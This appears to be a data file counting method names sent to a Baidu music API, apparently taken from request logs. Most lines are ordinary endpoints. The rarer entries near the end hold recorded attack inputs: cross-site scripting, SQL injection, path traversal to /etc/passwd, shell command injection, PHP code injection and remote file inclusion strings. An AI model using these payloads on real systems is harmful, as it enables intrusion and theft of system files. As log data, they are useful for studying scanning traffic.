baidu.ting.song.getInfos	63702767
baidu.ting.song.baseInfo	27724002
baidu.ting.search.catalogSug	23558325
baidu.ting.search.lrcpic	22507962
baidu.ting.user.listenAge	17770307
baidu.ting.search.common	15174200
baidu.ting.song.play	15165755
baidu.ting.song.down	9189596
baidu.ting.song.lry	6883317
baidu.ting.billboard.billList	6328942
baidu.ting.user.getUserBaseInfo	5987489
baidu.ting.song.getInfo	5822892
baidu.ting.user.checkSuggestVersion	5493683
baidu.ting.artist.getSongList	5172513
baidu.ting.search.lrcys	5128223
baidu.ting.search.getPhotoInfos	5118741
baidu.ting.artist.getList	4895591
ting.baidu.diy.getPlaylists	4738713
baidu.ting.game.gamedetail	3362334
baidu.ting.plaza.getRecommendAlbum	3034779
baidu.ting.user.checkComVersion	2994610
baidu.ting.diy.gedanInfo	2964398
baidu.ting.artist.getInfo	2694769
baidu.ting.plaza.active	2665572
baidu.ting.radio.playAction	2529939
baidu.ting.active.start	2418015
baidu.ting.user.config	2376037
baidu.ting.plaza.getFocusPic	2017657
baidu.ting.song.playAAC	1695841
baidu.ting.diy.gedanHot	1616116
baidu.ting.artist.getinfo	1444555
baidu.ting.search.suggestion	1400650
baidu.ting.diy.getNowOfficalList	1338114
baidu.ting.favorite.isCollect	1335872
baidu.ting.album.getAlbumInfo	1318941
baidu.ting.favorite.getCollectSong	1257975
baidu.ting.diy.category	1245170
baidu.ting.radio.getChannelSong	1232880
ting.baidu.plaza.recdaily	1228495
baidu.ting.diy.getSongFromOfficalList	1119194
baidu.ting.diy.addListenCount	990825
baidu.ting.plaza.recdaily	979654
baidu.ting.plaza.getPartDesc	953956
baidu.ting.artist.getAlbumList	866903
baidu.ting.song.audio	760592
baidu.ting.tag.songlist	697303
baidu.ting.diy.gedan	688869
baidu.ting.user.RegistToImsg	687510
baidu.ting.tag.getHotTag	631336
	584336
baidu.ting.user.down	550003
baidu.ting.feedback.song	484433
baidu.ting.radio.getCategoryList	456028
baidu.ting.search.getPhotoInfo	379005
baidu.ting.search.lrcyss	366764
baidu.ting.billboard.billCategory	360827
baidu.ting.artist.get72HotArtist	300089
baidu.ting.diy.getPlaylists	280524
baidu.ting.favorite.getFavoriteSong	201065
baidu.ting.plaza.recommend	184538
baidu.ting.song.buffer	167085
baidu.ting.game.gamelist	164775
baidu.ting.video.getList	160790
baidu.ting.favorite.addSongFavorites	133191
baidu.ting.song.getMulInfos	132231
baidu.ting.tag.getAllTag	107951
baidu.ting.diy.search	107285
baidu.ting.diy.getSimilarGedan	94239
baidu.ting.diy.getOfficialDiyList	91630
baidu.ting.video.play	73867
baidu.ting.user.checkVersion	61650
baidu.ting.favorite.addSongFavorite	60484
baidu.ting.artist.getSpecialSongList	58214
baidu.ting.plaza.getNewSongs	47681
baidu.ting.favorite.delCollectSong	43123
ting.baidu.diy.getPlaylist	32106
baidu.ting.radio.getArtistChannelSong	27322
baidu.ting.radio.getFavoriteSong	25483
baidu.ting.plaza.getArtistPlaza	20026
baidu.ting.radio.serv	18136
baidu.ting.diy.getPlaylist	17999
baidu.ting.artist.getHighSongTitle	14051
baidu.ting.feedback.crash	13972
baidu.ting.diy.saveList	11402
baidu.ting.album.getList	11303
ting.baidu.film.getFilmInfo	9669
baidu.ting.favorite.delSongFavorite	8654
baidu.ting.song.cloud	8417
baidu.ting.artist.getQianQianArtist	8200
baidu.ting.song.getMulInfo	7244
ting.baidu.song.lry	6772
baidu.ting.user.nplogin	6251
baidu.ting.video.category	5751
baidu.ting.diy.addListSong	4667
baidu.ting.user.logout	4621
baidu.ting.weixin.response	4450
baidu.ting.diy.delListSong	4444
baidu.ting.user.regPassport	4252
baidu.ting.diy.delList	4171
baidu.ting.colorRing.listen	3800
baidu.ting.billboard.catalog	3703
baidu.ting.artist.getHighSongList	3459
baidu.ting.user.getMobileVcode	2778
ting.baidu.artistapp.renum	2642
baidu.ting.colorRing.getCode	2588
baidu.ting.colorRing.authset	2069
baidu.ting.favorite.delSongFavorites	1842
baidu.ting.artist.getSongVote	1725
baidu.ting.feedback.info	1490
baidu.ting.favorite.getFavoriteAlbum	1481
baidu.ting.diy.getRecommendSpeical	1440
baidu.ting.user.getMessage	1353
baidu.ting.artist.getSongRank	1279
baidu.ting.artist.getSong	1270
baidu.ting.diy.upList	1166
ting.baidu.artistapp.brief	854
baidu.ting.favorite.getListenHistory	838
baidu.ting.diy.addList	832
baidu.ting.user.registToUC	748
baidu.ting.game.catalog	738
baidu.ting.video.recMv	575
baidu.ting.favorite.getOffenListenList	487
baidu.ting.game.gameplay	379
baidu.ting.colorRing.subscribe	352
baidu.ting.user.activate	344
baidu.ting.song.getSuoSongInfo	338
baidu.ting.artist.getInfoByName	310
baidu.ting.colorRing.toneselect	288
baidu.ting.song.getHash	280
baidu.ting.artistapp.photo	230
baidu.ting.user.login	219
baidu.ting.favorite.getInfoFromView	184
baidu.ting.favorite.addAlbumFavorite	158
baidu.ting.plaza.getMisNewSong	128
ting.baidu.artistapp.newList	112
baidu.ting.favorite.delAlbumFavorite	90
ting.baidu.artistapp.news	89
ting.baidu.artistapp.briefs	56
baidu.ting.user.addPassportInfo	53
baidu.ting.mv.playMV	40
baidu.ting.mv.getIndexMV	38
baidu.ting.outerPassport.profile	35
baidu.ting.album.getAlbumstyle	33
baidu.ting.search.catalogsug	32
baidu.ting.mv.searchMV	26
 /v8  ADw-script AD4-sslx=812812 ADw-/script AD4- nonxss	25
ting.baidu.mv.searchMV	9
ting.baidu.artistapp.send	8
baidu.ting.song.playabcdc>>>>>\'\'\'\'\'\"\"\"\"\";;;	6
\' (	6
(	6
baidu.ting.song.getinfos	6
baidu.ting.mv.getMultiSongMVInfo	5
baidu.ting.billboard.billListtype=23format=jsonoffset=0size=50from=iosfields=title,song_id,author,resource_type,havehigh,is_new,album_title,ting_uid,album_id,charge,all_rateversion=4.3.0from=ios	4
baidu.ting.song.play\';alert(1);\'	4
ting.baidu.billboard.billList	4
baidu.ting.song.getInfoq	3
baidu.ting.artist.getInfoList	3
baidu.ting.song.play\"\'><body id=ssltest title=alert(1) onload=eval(ssltest.title)>	2
baidu.ting.song.play\'>\"></title></textarea></script><img src=a onerror=alert(1)>	2
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_	2
/usr/bin/id;	2
baidu.ting.song.play(\')\'))(\")\'\"\"\"\")	2
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local	2
baidu.ting.song.play</textarea></title><script>alert(1)</script>	2
baidu.ting.song.play--></script><script>alert(1)</script>	2
../../../../../../../../../../etc/rc.d/rc.local_.jpeg	2
baidu.ting.song.play>\'>\"><script>alert(1)</script>	2
baidu.ting.song.play<script>confirm(1)</script>	2
baidu.ting.song.play%\' and 8281=8281 and \'%\'=\'	2
http://cirt.lnet/rfiinc.txt	2
baidu.ting.song.play</script><script>alert(1);//	2
../../../../../../../../../../etc/rc.d/rc.local_	2
data://text/plain;base64,W0hlbGxvIEFpc2h5XQ==_	2
data://text/plain;base64,W0hlbGxvIEFpc2h5XQ==	2
../../../../../../../../../../etc/rc.d/rc.local	2
baidu.ting.song.play\') and 8288=8288 and (\'	2
baidu.ting.mv.getMVCategory	2
baidu.ting.song.play\'/**/<scr/**/ipt>/**/>	2
baidu.ting.song.play\' and \'8281\'=\'8281	2
../../../../../../../../../../etc/passwd_	2
../../../../../../../../../../etc/passwd	2
set	2
baidu.ting.song.playjavascript:alert(1)	2
${@print(md5(812812))}	2
baidu.ting.song.play\'\";alert(1);//	2
ting.baidu.game.gamedetail	2
file:///etc/rc.d/rc.local_	2
baidu.ting.song.play\"><img src=1 onerror=alert(1)>	2
baidu.ting.song.play\";alert(1);\"	2
http://cirt.lnet/rfiinc.txt_.html	2
http://10.42.7.217/?1384340070.82	2
1\\\";cat /etc/rc.d/rc.local;\\\"	2
http://10.42.7.217/?1384356577.3	2
baidu.ting.song.play;alert(1);//	2
file:///etc/rc.d/rc.local	2
file:///etc/passwd	2
baidu.ting.search.getphotoinfos	2
string:{var_dump(md5(812812))}	2
1;cat /etc/rc.d/rc.local;	2
file:///etc/passwd_.html	2
%{	2
${	2
file:///etc/passwd_	2
c:/windows/win.ini_	2
c:/windows/win.ini	2
\'];${@print(md5(812812))};//	2
1\';cat /etc/rc.d/rc.local;\'	2
http://cirt.lnet/rfiinc.txt_	2
baidu.ting.song.play<scrip<script>t>window.a==1?1:alert(1)</scrip</script>t>	2
baidu.ting.song.play\'>\\\';</script>>\\\"><script>alert(1)</script>\'	2
baijson	1
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_.jpeg	1
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_.html	1
data://text/plain;base64,W0hlbGxvIEFpc2h5XQ==_.html	1
data://text/plain;base64,W0hlbGxvIEFpc2h5XQ==_.htm	1
baidu.ting.plaza.getfocuspic	1
../../../../../../../../../../etc/passwd_.html	1
baidu.ting.video.getListcategoryId=2pn=1rn=20	1
../../../../../../../../../../etc/passwd_.htm	1
ting.baidu.search.playback	1
ting.baidu.plaza.recommend	1
baidu.ting.search.lrcpormaormat=json	1
ting.baidu.plaza.active	1
ting.baidu.game.catalog	1
ting.baidu.user.checkSuggestVersion	1
c:/windows/win.ini_.php	1
baidu.ting.user99920403	1
ting.baidu.song.audio	1
baidu.ting.push.send	1
baidu.ting.plaza.getrecommendalbum	1
baidu.ting.user.checkComVtypeid=2	1
baidu.ting.artist.get72hotartist	1
ting.baidu.user.getUserBaseInfo	1
ting.baidu.feedback.crash	1
baidu.ting.user.listenAee	1
file:///etc/rc.d/rc.local_.php	1
file:///etc/rc.d/rc.local_.jpg	1
c:/windows/win.ini_.jpeg	1
ting.baidu.billboard.billlist	1
baidu.ting.artist.getsonglist	1
baidu.ting.user.registtoimsg	1
baidu.wing.song.getInfos	1
baidu.ting.tag.gethottag	1
ting.baidu.diy.gedan	1
brmat=json	1
